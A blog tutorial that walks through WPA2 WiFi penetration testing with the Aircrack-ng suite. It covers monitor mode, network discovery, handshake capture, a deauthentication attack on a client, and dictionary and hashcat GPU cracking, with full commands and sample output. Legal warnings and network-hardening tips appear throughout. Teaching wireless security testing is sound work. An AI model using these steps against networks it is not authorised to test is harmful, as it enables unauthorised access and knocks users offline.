WiFi Pentesting with Aircrack-ng - Educational Security Tutorial

WiFi Pentesting with Aircrack-ng Suite

A comprehensive guide to wireless network security testing using Aircrack-ng tools for educational purposes.

Spaidy Security Team
February 8, 2026
15 min read
#Security#Pentesting#WiFi#Aircrack-ng
Spaidy
SpaidyJoined Sep 18, 2025
1,000 pts🏆 1
Warning
This tutorial is for educational purposes only. Only test on networks you own or have explicit permission to test. Unauthorized access to computer networks is illegal.

Introduction to Aircrack-ng

Aircrack-ng is a complete suite of tools to assess WiFi network security. It focuses on different areas of WiFi security including monitoring, attacking, testing, and cracking. The suite includes tools like airmon-ng, airodump-ng, aireplay-ng, and aircrack-ng itself.

Tip
Before starting, make sure you have a wireless adapter that supports monitor mode and packet injection. Popular chipsets include Atheros AR9271 and Ralink RT3070.

Prerequisites

First, let's install Aircrack-ng on a Debian-based system:

bash
# Update package list
sudo apt update

# Install Aircrack-ng suite
sudo apt install aircrack-ng -y

# Verify installation
aircrack-ng --version

Expected Output

Airodump-ng capturing packets

Figure 1: Capturing WiFi traffic using airodump-ng

text
Aircrack-ng 1.7
https://www.aircrack-ng.org

Compiled with gcc 11.3.0
OpenSSL 3.0.2
SQLite 3.37.2
SIMD support: AVX2

Step 1: Check Wireless Interface

First, we need to identify our wireless interface and check if it supports monitor mode:

bash
# List wireless interfaces
iwconfig

# Check interface details
iw list

Sample Output

text
wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   
          Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

Step 2: Enable Monitor Mode

Monitor mode allows your wireless adapter to capture all WiFi traffic in range, not just packets addressed to your device.

bash
# Kill processes that might interfere
sudo airmon-ng check kill

# Enable monitor mode on wlan0
sudo airmon-ng start wlan0

# Verify monitor mode is enabled
iwconfig

Expected Output

text
PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k_htc       Atheros AR9271

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
Info
After enabling monitor mode, your interface will typically be renamed to wlan0mon or similar.

Step 3: Discover Networks

Now let's scan for nearby WiFi networks using airodump-ng:

bash
# Start scanning on all channels
sudo airodump-ng wlan0mon

# Scan specific channel (e.g., channel 6)
sudo airodump-ng -c 6 wlan0mon

Sample Airodump Output

text
 CH  6 ][ Elapsed: 12 s ][ 2026-02-08 10:30 

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 A4:12:42:8B:9E:3C  -42       23       45    3   6  540  WPA2 CCMP   PSK  MyTestNetwork
 B8:27:EB:4D:2F:1A  -67       12        0    0   6  130  WPA2 CCMP   PSK  OfficeWiFi
 C4:8E:8F:F1:6C:9D  -73        8        2    0  11  270  WPA2 CCMP   PSK  Neighbor_WiFi

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 A4:12:42:8B:9E:3C  DC:A6:32:1F:8B:4E  -45    0 - 1      0       12  MyTestNetwork
 A4:12:42:8B:9E:3C  E8:94:F6:2A:3C:7B  -52   54 -54      0       28  MyTestNetwork
Note
Understanding the Output:
  • BSSID: MAC address of the access point
  • PWR: Signal strength (-1 is best, -100 is worst)
  • CH: Channel number
  • ENC: Encryption type (WEP, WPA, WPA2, WPA3)
  • STATION: Connected client MAC addresses

Step 4: Capture Handshake

To crack a WPA/WPA2 password, we need to capture the 4-way handshake that occurs when a device connects to the network:

bash
# Capture traffic from target network
# Replace BSSID with target AP MAC, CHANNEL with target channel
sudo airodump-ng -c 6 --bssid A4:12:42:8B:9E:3C -w capture wlan0mon
Tip
The -w capture flag saves packets to files named capture-01.cap, capture-02.cap, etc.

Capturing Output

text
 CH  6 ][ Elapsed: 1 min ][ 2026-02-08 10:35 ][ WPA handshake: A4:12:42:8B:9E:3C 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 A4:12:42:8B:9E:3C  -38 100       89      324   12   6  540  WPA2 CCMP   PSK  MyTestNetwork

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 A4:12:42:8B:9E:3C  DC:A6:32:1F:8B:4E  -42   54e-54    127     891  MyTestNetwork

Deauthentication Attack (Optional)

If no handshake is captured naturally, you can deauthenticate a client to force a reconnection:

bash
# Deauth attack (in a new terminal)
# -0 10: Send 10 deauth packets
# -a: Target AP BSSID
# -c: Target client BSSID
sudo aireplay-ng -0 10 -a A4:12:42:8B:9E:3C -c DC:A6:32:1F:8B:4E wlan0mon

Deauth Output

text
10:35:42  Waiting for beacon frame (BSSID: A4:12:42:8B:9E:3C) on channel 6
10:35:42  Sending 64 directed DeAuth (code 7). STMAC: [DC:A6:32:1F:8B:4E] [ 1|65 ACKs]
10:35:43  Sending 64 directed DeAuth (code 7). STMAC: [DC:A6:32:1F:8B:4E] [ 2|68 ACKs]
10:35:44  Sending 64 directed DeAuth (code 7). STMAC: [DC:A6:32:1F:8B:4E] [ 3|72 ACKs]
Warning
Deauthentication attacks temporarily disconnect users from the network. This should only be performed on networks you own or have permission to test.

Step 5: Crack the Password

Once you have captured a handshake, you can attempt to crack it using a wordlist:

bash
# Basic dictionary attack
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b A4:12:42:8B:9E:3C capture-01.cap

# With specific ESSID
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -e MyTestNetwork capture-01.cap

Cracking Process Output

text
Opening capture-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.7

      [00:00:00] 8234/14344392 keys tested (1456.78 k/s) 

      Time left: 2 hours 43 minutes 18 seconds                   0.06%

                           KEY FOUND! [ testpassword123 ]


      Master Key     : 8B 7D 4F 2E 9C 1A 3F 6D 5E 8A 2B 4C 7D 9E 1F 3A 
                       6B 8C 4D 2E 9F 1B 3D 5E 7A 9C 2B 4D 6F 8E 1A 3C 

      Transient Key  : 4D 2E 9F 1B 3D 5E 7A 9C 2B 4D 6F 8E 1A 3C 5B 7D
                       9E 2F 4A 6C 8D 1E 3F 5B 7C 9D 2E 4F 6A 8B 1C 3D
                       5E 7F 9A 2C 4D 6E 8F 1A 3B 5C 7D 9E 2F 4A 6B 8C
                       1D 3E 5F 7A 9B 2C 4D 6E 8F 1A 3B 5C 7D 9E 2F 4A

      EAPOL HMAC     : A3 B4 C5 D6 E7 F8 09 1A 2B 3C 4D 5E 6F 70 81 92
Success
If the password is in your wordlist, Aircrack-ng will find it and display KEY FOUND! along with the password.

Step 6: Disable Monitor Mode

When you're done testing, disable monitor mode to return to normal operation:

bash
# Stop monitor mode
sudo airmon-ng stop wlan0mon

# Restart network manager
sudo systemctl restart NetworkManager

Advanced Techniques

Creating Custom Wordlists

You can create targeted wordlists using tools like crunch:

bash
# Install crunch
sudo apt install crunch

# Generate wordlist with 8-10 character passwords
# Using lowercase letters and numbers
crunch 8 10 abcdefghijklmnopqrstuvwxyz0123456789 -o custom-wordlist.txt

# Generate with pattern (e.g., Password followed by 4 digits)
crunch 12 12 -t Password@@@@ -o pattern-wordlist.txt

Using GPU for Faster Cracking

For faster cracking, you can use hashcat with GPU acceleration:

bash
# Convert capture to hashcat format
sudo aircrack-ng -J hashcat-capture capture-01.cap

# Crack with hashcat (GPU)
hashcat -m 2500 -a 0 hashcat-capture.hccapx /usr/share/wordlists/rockyou.txt

Security Best Practices

Info
Protecting Your Network:
  • Use WPA3 encryption when available
  • Create strong, unique passwords (16+ characters)
  • Disable WPS (WiFi Protected Setup)
  • Hide SSID broadcast (security through obscurity)
  • Enable MAC address filtering
  • Regularly update router firmware
  • Use a guest network for visitors
  • Monitor connected devices regularly

Common Issues and Solutions

Issue: No Handshake Captured

text
Solution:
1. Wait longer - handshakes occur when devices connect
2. Move closer to the access point
3. Perform deauth attack on connected clients
4. Try different channels if interference is present

Issue: Monitor Mode Not Working

text
Solution:
1. Check if your adapter supports monitor mode
2. Update wireless drivers
3. Try different USB ports
4. Check if airmon-ng killed interfering processes

Issue: Slow Cracking Speed

text
Solution:
1. Use GPU-based cracking with hashcat
2. Use targeted wordlists instead of generic ones
3. Try rainbow tables for common passwords
4. Consider cloud-based cracking services

Conclusion

Aircrack-ng is a powerful suite for WiFi security testing. Understanding how these attacks work helps in securing your own networks against similar threats. Always remember that unauthorized access to networks is illegal and unethical.

Danger
Legal Disclaimer: This guide is provided for educational purposes only. Only perform security testing on networks you own or have explicit written permission to test. Unauthorized access to computer networks is a crime in most jurisdictions and can result in severe legal consequences.

Further Reading